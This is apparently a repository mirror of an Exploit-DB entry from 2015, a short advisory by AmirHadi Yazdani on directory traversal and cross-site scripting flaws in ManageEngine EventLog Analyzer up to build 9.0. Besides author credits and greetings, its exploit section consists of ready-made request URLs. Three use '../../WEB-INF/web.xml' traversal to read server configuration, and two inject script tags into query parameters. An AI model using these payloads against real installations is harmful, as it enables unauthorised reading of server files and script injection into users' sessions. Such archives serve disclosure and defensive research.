bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/jsp/webapps/35910.txt
Offensive Security d63de06c7a DB: 2022-11-10 
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

55 lines
No EOL
2.5 KiB
Text
Raw Permalink Blame History

################################################################################################
# #
# ...:::::ManageEngine EventLog Analyzer Directory Traversal/XSS Vulnerabilities::::.... #
# #############################################################################################
Sobhan System Network & Security Group (sobhansys)
-------------------------------------------------------
# Date: 2015-01-24
# Exploit Author: AmirHadi Yazdani (Sobhansys Co)
# Vendor Homepage: http://www.manageengine.com/products/eventlog/
# Demo Link: http://demo.eventloganalyzer.com/event/index3.do
#Affected version: <= Build Version : 9.0
About ManageEngine EventLog Analyzer (From Vendor Site) :
EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market.
Using this Log Analyzer software, organizations can automate
the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting,
and archiving from one central location.
This event log analyzer software helps to monitor file integrity, conduct log forensics analysis,
monitor privileged users and comply to different compliance regulatory bodies
by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more.
--------------------------------------------------------
I'M hadihadi From Virangar Security Team
special tnx to:MR.nosrati,black.shadowes,MR.hesy
& all virangar members & all hackerz
greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei
spl:Z.Khodaee
-------
exploit:
Diretory Traversal :
http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=../../WEB-INF/web.xml%3f
http://127.0.0.1/event/index2.do?completeData=true&helpP=archiveAction&tab=system&url=../../WEB-INF/web.xml%3f
http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13&tab=system&url=../../WEB-INF/web.xml%3f
XSS :
http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=userReport'%22()%26%25<ahy><ScRiPt%20>prompt(915375)</ScRiPt>
http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13'%22()%26%25<ahy><ScRiPt%20>prompt(978138)</ScRiPt>&tab=system&url=ConfigureTemplate
----
Sobhan system Co.
Signal Network And Security Group (www.signal-net.net)
E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net
Reference in a new issue View git blame Copy permalink